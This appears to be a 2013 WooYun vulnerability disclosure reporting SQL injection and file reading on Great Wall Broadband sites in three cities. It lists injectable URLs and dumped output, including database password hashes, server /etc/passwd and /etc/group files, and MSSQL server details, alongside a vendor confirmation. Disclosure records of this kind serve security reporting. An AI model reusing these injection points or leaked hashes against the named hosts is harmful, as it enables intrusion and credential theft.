当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023331

漏洞标题:三地长城宽带官网sql注入&任意文件读取的问题

相关厂商:长城宽带

漏洞作者: 雅柏菲卡

提交时间:2013-05-09 10:47

修复时间:2013-06-23 10:48

公开时间:2013-06-23 10:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-09: 细节已通知厂商并且等待厂商处理中
2013-05-12: 厂商已经确认,细节仅向厂商公开
2013-05-22: 细节向核心白帽子及相关领域专家公开
2013-06-01: 细节向普通白帽子公开
2013-06-11: 细节向实习白帽子公开
2013-06-23: 细节向公众公开

简要描述:

................

详细说明:

.................

漏洞证明:

【厦门市】
注入点
http://www.xmgwbn.com/job/main.php?id=36

7.jpg


8.jpg


Sql Version: 5.0.18
Current DB: xmgwbn
System User: root@localhost
DB User & Pass: root:*A67B7A9CD1A06791800F1768B296A5B2A1C02182:localhost
root::xmgwbn.com
::xmgwbn.com
::localhost
hullz:*F26FC8E6CED3A65125886E17250FE574260124D4:localhost
Data Bases: information_schema
cjvod
mysql
noevil
test
xmgwbn
xmgwbnweb
【/etc/passwd】
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:1001:1001:User &:/home/mysql:/bin/sh
zabbix:*:1002:1002:User &:/home/zabbix:/usr/sbin/nologin
【/etc/group】
# $FreeBSD: src/etc/group,v 1.32.2.1 2006/03/06 22:23:10 rwatson Exp $
#
wheel:*:0:root
daemon:*:1:
kmem:*:2:
sys:*:3:
tty:*:4:
operator:*:5:root
mail:*:6:
bin:*:7:
news:*:8:
man:*:9:
games:*:13:
staff:*:20:
sshd:*:22:
smmsp:*:25:
mailnull:*:26:
guest:*:31:
bind:*:53:
proxy:*:62:
authpf:*:63:
_pflogd:*:64:
_dhcp:*:65:
uucp:*:66:
dialer:*:68:
network:*:69:
audit:*:77:
www:*:80:
nogroup:*:65533:
nobody:*:65534:
mysql:*:1001:
zabbix:*:1002:


【广州市】
注入点:http://point.gzgwbn.com.cn/news.aspx?ncid=1

9.jpg

难以忍受解表时间 就搁在这儿


【东莞市】
注入点:http://www.dggwbn.net.cn/MsgList.aspx?msg=1
Target: http://www.dggwbn.net.cn/MsgList.aspx?msg=1
Host IP: 211.161.63.226
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MsSQL no error
Resp. Time(avg): 229 ms
Current User: dbo
Current DB: Epon
System User: sa
Host Name: PBSCK-DF38539FA
Server Name: DGPBSGD02
master
tempdb
model
msdb
ReportServer
ReportServerTempDB
Epon
Epon_Bak

10.jpg

一堆表 未深入

11.jpg

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2013-05-12 23:50

厂商回复:

CNVD确认并复现所述情况,已在10日下午较晚些时候终于联系上长城宽带总部联系人,与http://www.wooyun.org/bugs/wooyun-2013-023280事件一并交由其处置。
该事件与http://www.wooyun.org/bugs/wooyun-2013-023280相比,部分系统可提权,rank较高,按多个案例进行评分,rank 16

最新状态:

暂无